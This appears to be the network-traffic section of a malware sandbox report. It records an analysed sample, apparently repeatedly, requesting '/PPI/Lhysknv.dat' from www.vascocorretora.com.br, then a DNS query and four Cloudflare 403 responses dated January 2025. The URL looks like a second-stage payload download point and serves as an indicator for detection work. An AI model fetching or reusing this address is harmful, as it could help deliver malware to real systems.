Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficDNS traffic detected: DNS query: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qu5jXw8KN2hmxtxhLea2Y%2BrAS6e0VBOVYvJLGZJNFExR4jnoMjTyWNRJ1jmjbcy6S0xhqC8gaFSQnmhplSPVCIy29TL8vDnns7FaL0%2FybZ3NVcXLUMwYOMkP2U30uqqBlg7BaEwdjpIJ%2F96Q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0dbe9b81875-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1648&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1660034&cwnd=153&unsent_bytes=0&cid=089f531add810e65&ts=346&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXS%2B9GFMQFhuNzdUeZyNlnTaQT4l8x2nftom3IzQOdohJ%2FdO10AX09o0pQnwwKAjU9IaicZdiI0WkVTF3wBNkHTh3hSb1A1yrNmatneqTRAYBZeK1ttNorH8zJFTF7YV%2FAAyiLJdJZmCSOTQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0e12cc9c445-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1706&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1711606&cwnd=232&unsent_bytes=0&cid=3d2515e337f8be02&ts=341&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LotxgB1uUdpsbNu35VKNYZXh5kZ7BxpWFS2asNBv23EgriARUoyaHYpm0UO0qJg7VXTOvoAtKFiCDu4%2B45aj7ghDeIaVVr3vIOFywKT1wNG4lIItisrzwHIYzXjHoARMvLeEQtCIYGBd9%2BV8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0e50a0d7285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1956&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1465863&cwnd=249&unsent_bytes=0&cid=cbf27c8ba21a31e7&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBe0YcJU9io0%2Ff6m5Vc%2BkPplqU2kcf17I3WHZ71AogN0Wrb%2BQzmfImx2%2BDRHS%2FRkbWbSgqOurgDmtAPx1K%2BRU65gXuf%2FGfFD8EWWe%2BsHyQcFcfg1skYd0CHUOBPSQAsliZpVGr2%2FaPyHulnQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0e8aff90cc6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1500&rtt_var=572&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1898569&cwnd=180&unsent_bytes=0&cid=b9f4833fe7a79a22&ts=132&x=0"
